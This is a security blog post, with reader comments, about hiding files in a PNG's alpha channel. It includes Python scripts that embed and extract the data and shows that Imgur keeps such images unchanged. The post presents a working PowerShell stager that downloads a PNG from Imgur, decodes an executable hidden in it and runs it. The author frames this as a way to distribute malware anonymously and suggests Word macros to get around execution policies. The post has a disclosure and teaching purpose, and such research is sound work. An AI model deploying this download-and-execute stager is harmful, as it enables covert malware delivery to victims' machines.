This isn't very stealthy, and there are better ways to do it.
Encoding a file within a PNG
First, it helps to understand the PNG format. Unlike JPEG, PNG compression is lossless, meaning that an image saved in the format retains exactly the data it was created with unless the resolution or colour palette is modified. Unlike GIF, PNG handles transparency through an alpha channel instead of colour substitution.
It's this compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit value for the transparency level (referred to as an "alpha channel"). This means that each pixel is represented as R, G, B, and A, with each value ranging from 0 to 255.
Here's a sample image (sourced via Wikipedia) with what I am talking about:
This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels and, at one byte of alpha per pixel, about 468 KB of space that we can place data within. Let's use Pillow and Python to mess with this.
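As a quick check of that arithmetic, here is a minimal sketch. The helper name `alpha_capacity` is made up for illustration. It assumes one byte is stored per pixel and that the payload is Base64-encoded first, which expands every 3 bytes into 4 characters, so the usable payload is smaller than the raw pixel count.

```python
def alpha_capacity(width, height):
    """Return (raw_bytes, max_payload_bytes) when storing one byte per pixel."""
    raw = width * height
    # Base64 turns every 3 payload bytes into 4 encoded characters,
    # so only three quarters of the raw space carries payload.
    payload = (raw // 4) * 3
    return raw, payload


raw, payload = alpha_capacity(800, 600)
print(raw, raw / 1024)          # 480000 468.75
print(payload, payload / 1024)  # 360000 351.5625
```

So the 800x600 sample has room for roughly 351 KB of original file once the Base64 overhead is accounted for.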
The following script (written here for Python 3) embeds a payload file into the alpha channel of an image:
from base64 import b64encode
from sys import argv, exit

from PIL import Image

i = argv[1]  # input image
o = argv[2]  # output image

# Read the payload and Base64-encode it
with open(argv[3], 'rb') as f:
    text = b64encode(f.read())

# Make sure there is an alpha channel to write into
img_in = Image.open(i).convert('RGBA')
width, height = img_in.size
img_pad = width * height  # one encoded byte per pixel

if len(text) > img_pad:
    exit('File is too large to embed into the image.')

# Pad with null bytes so that every pixel gets a value
text = text + b'\x00' * (img_pad - len(text))

# Split the data into one block per column of pixels
text = [text[n:n + height] for n in range(0, len(text), height)]

img_o = Image.new(img_in.mode, img_in.size)

for ih, tblock in zip(range(width), text):
    for iv, an in zip(range(height), tblock):
        x, y, z, a = img_in.getpixel((ih, iv))
        # Keep the colour, replace the alpha value with a payload byte
        img_o.putpixel((ih, iv), (x, y, z, an))

img_o.save(o)
Executing it is as follows:
$ python encoder.py image.png image_out.png payload.dat
When it runs, it encodes the payload using Base64, checks that the encoded data is not larger than the image can handle, and then pads it with null bytes until it reaches the total number of pixels. Each pixel's alpha channel value is then replaced with the value of the corresponding character in the encoded data, and the result is saved to disk.
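The steps described above can be sketched without Pillow by treating the image as a flat list of (R, G, B, A) tuples. This is a simplified illustration rather than the script itself: the names `embed` and `extract` and the 4x4 red test image are assumptions, and the pixel order is simply the order of the list.

```python
from base64 import b64decode, b64encode


def embed(pixels, payload):
    """Return a copy of pixels with the payload written into the alpha values."""
    data = b64encode(payload)
    if len(data) > len(pixels):
        raise ValueError('payload is too large for this image')
    # Pad with null bytes so that every pixel receives a value
    data += b'\x00' * (len(pixels) - len(data))
    return [(r, g, b, value) for (r, g, b, _), value in zip(pixels, data)]


def extract(pixels):
    """Recover the payload from the alpha values of pixels."""
    data = bytes(a for _, _, _, a in pixels)
    # Strip the null padding before decoding the Base64 text
    return b64decode(data.replace(b'\x00', b''))


# A hypothetical 4x4 opaque red image, flattened into 16 pixels
pixels = [(255, 0, 0, 255)] * 16
stego = embed(pixels, b'hello')
print(stego[0])        # (255, 0, 0, 97): colour kept, alpha is now ord('a')
print(extract(stego))  # b'hello'
```

Null bytes are safe to use as padding because they never appear in Base64 output, which is why they can be removed again without damaging the data.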
Let's embed an image into an image, shall we?
I've encoded a JPEG inside this image. The image has obviously taken on a somewhat softer look, with some jankiness in the transparency, but you would not normally think of it as suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.
For the curious, this is the image that was embedded within:
This Python script can retrieve the data out of the image:
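from base64 import b64decode
from sys import argv

from PIL import Image

i = argv[1]  # image carrying the payload
s = argv[2]  # file to write the payload to

img = Image.open(i)
o = bytearray()

# Walk the pixels column by column, the same order the encoder used
for x in range(img.size[0]):
    for y in range(img.size[1]):
        p = img.getpixel((x, y))
        o.append(p[-1])  # the alpha value is the last channel

# Drop the null padding, then decode the Base64 data
o = b64decode(bytes(o).replace(b'\x00', b''))

with open(s, 'wb') as f:
    f.write(o)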
We can confirm that nothing is lost by running these commands:
$ md5 blog_sample.png
MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b
$ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ md5 antivirus.jpg
MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b
$ python decoder.py blog_sample.out.png antivirus.orig.jpg
$ md5 antivirus.orig.jpg
MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b
As you can see, the extracted file has the same hash as the original payload, so its contents are not changed by being embedded within the image's alpha channel.
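On systems without an `md5` command, the same comparison can be done from Python with the standard `hashlib` module. This is only a sketch: the helper names `file_md5` and `same_contents` are made up here.

```python
import hashlib


def file_md5(path, chunk_size=65536):
    """Return the hex MD5 digest of the file at path."""
    digest = hashlib.md5()
    with open(path, 'rb') as f:
        # Read in chunks so that large files do not have to fit in memory
        for chunk in iter(lambda: f.read(chunk_size), b''):
            digest.update(chunk)
    return digest.hexdigest()


def same_contents(path_a, path_b):
    """True if both files hash to the same MD5 digest."""
    return file_md5(path_a) == file_md5(path_b)
```

With the files from the session above, `same_contents('antivirus.jpg', 'antivirus.orig.jpg')` would be expected to return `True`.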
Let's use Imgur and PowerShell to abuse this
Since its debut on Reddit, Imgur has become one of the largest image hosting services. This is largely due to its ease of access in uploading images without requiring anyone to create an account.
In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use the old technique of combining a zip file with a JPEG or PNG on their service, as it appears to strip the extra data outright.
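For context, a hybrid file of that kind usually has the extra data appended after the end of the image. The sketch below shows one way such trailing data could be spotted in a PNG by walking its chunks up to the final `IEND` chunk. It is an assumption about how a check like this might work, not a description of what Imgur actually does, and the function name `trailing_bytes` is made up.

```python
import struct

PNG_SIGNATURE = b'\x89PNG\r\n\x1a\n'


def trailing_bytes(data):
    """Return whatever follows the IEND chunk of a PNG byte string."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError('not a PNG file')
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        # Each chunk is: 4-byte length, 4-byte type, data, 4-byte CRC
        length, chunk_type = struct.unpack('>I4s', data[pos:pos + 8])
        pos += 8 + length + 4
        if chunk_type == b'IEND':
            return data[pos:]
    raise ValueError('no IEND chunk found')
```

A non-empty result means something was appended to the image. Data hidden inside the alpha channel lives in the pixel data itself, so a check like this would not see it.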
Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encode as demonstrated earlier. Let's try uploading the sample image from earlier and check.
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ wget https://i.imgur.com/Oj8FhU5.png
--2016-11-24 13:56:50-- https://i.imgur.com/Oj8FhU5.png
Resolving i.imgur.com... 151.101.52.193
Connecting to i.imgur.com|151.101.52.193|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 664208 (649K) [image/png]
Saving to: 'Oj8FhU5.png'
Oj8FhU5.png 100%[====================================>] 648.64K 2.42MB/s in 0.3s
2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208]
$ md5 Oj8FhU5.png
MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
As we can see here, the file that was uploaded to Imgur has not been altered.
So where do we go from here? How is this useful? Well, to start, the great thing about Imgur is that you do not need to sign up for an account to upload an image. Why not use it to distribute malware without having to provide too many details?
One thing to keep in mind is that something still has to retrieve the PNG image and then process it. While there have been code execution issues with PNG libraries in the past, for the most part just loading a payload-carrying image is unlikely to result in compromise.
Fortunately, Windows has built-in functions that let you work with an image and extract the pixel data directly. This can be achieved using PowerShell without any additional modules. The code is as follows:
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName System.Text.Encoding

$strURL = "http://i.imgur.com/nckqSN1.png"
$strFilename = "c:\temp\payloadb64.png"
$peOutputFile = "c:\temp\calc.exe"

Invoke-WebRequest -Uri $strURL -OutFile $strFilename

$image = [System.Drawing.Image]::FromFile($strFilename)

$peBase64 = @()
for ($w=0;$w -lt $image.Width;$w++)
{
    $row = @()
    for ($h=0;$h -lt $image.Height;$h++)
    {
        $pixel = ($image.GetPixel($w,$h)).A
        $pixel = [convert]::toint32($pixel, 10)
        $pixel = [char]$pixel
        $row += $pixel
    }
    $peBase64 = $peBase64 + $row
}

$peImage = @()
foreach ($peValue in $peBase64)
{
    if ($peValue -ne "`0")
    {
        $peImage += $peValue
    }
}

$peImage = [System.Convert]::FromBase64String($peImage)
[System.IO.File]::WriteAllBytes($peOutputFile, $peImage)

& $peOutputFile
The script works as follows:
- Download a PNG from Imgur and save it to disk
- Using System.Drawing, read every pixel and extract the alpha (A) value
- Ensure that all null values (0x00) are stripped from the array
- Decode Base64 and write file to disk
- Run the newly decoded file as an executable
Executing the above code does require that your system's policy allows the execution of PowerShell scripts. On most home computers this is not an issue, as script execution is disabled by default, but many enterprise environments require it to be on. A way around any restrictions could be to execute the code with the help of VBScript, perhaps storing all of this within a Word macro.
Mitigation
One thing to keep in mind is that while the attack was done using PowerShell, the same could be achieved with a Word document with an embedded macro. From an end-user perspective, not executing any unwanted code is really the best way to avoid this.
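On the defensive side, the encoding used in this post leaves a fairly obvious fingerprint: once the null padding is removed, every alpha value is a Base64 character. The following is a rough heuristic sketch built on that observation. The function name and the `min_length` threshold are arbitrary assumptions, and an encoder that hides data less crudely would not be caught by it.

```python
import string

# Byte values of the standard Base64 alphabet, including '=' padding
BASE64_ALPHABET = set((string.ascii_letters + string.digits + '+/=').encode())


def alpha_looks_like_base64(alpha_values, min_length=64):
    """Heuristic: True if the non-null alpha values are all Base64 characters."""
    data = bytes(alpha_values).replace(b'\x00', b'')
    if len(data) < min_length:
        return False
    return all(value in BASE64_ALPHABET for value in data)
```

The alpha values can come from any image library. With Pillow, for example, `Image.open(path).getchannel('A').tobytes()` returns them for an image that has an alpha channel. An ordinary opaque image has alpha values of 255, which is not a Base64 character, so it is not flagged.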
Imgur's response
Imgur did get back to me, stating that while the report was informative, there isn't an immediate need to fix the issue given the impact it presents.
Last Remark
I want to make it clear here that what I am showing, embedding data through a steganographic process, is far from new; it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice, and there are many guides out there to read and software suites to use.
Also, yesterday, PortSwigger posted an article on doing something similar using JPEG files that was rather interesting.
Great article, thanks for posting!
I'm a little confused. How does the malicious code embedded in the image get extracted on the victim's machine? It looks like you had to deliberately run a specific PowerShell script to do so, which a victim wouldn't know to do.
I assumed that in this case the victim has already been infected, and an image hosting site would be used as an anonymous code repository. Victim silently checks in once a day or whatever.
There was a botnet recently that was doing something like this. They hid the malware in a .png image, and published it to an advertising network, along with the accompanying javascript. If the victim met a set of criteria, the malware was extracted from the image via javascript, and an exploit kit was used to execute it. In this case the malware was using CSRF to change settings on routers.
https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices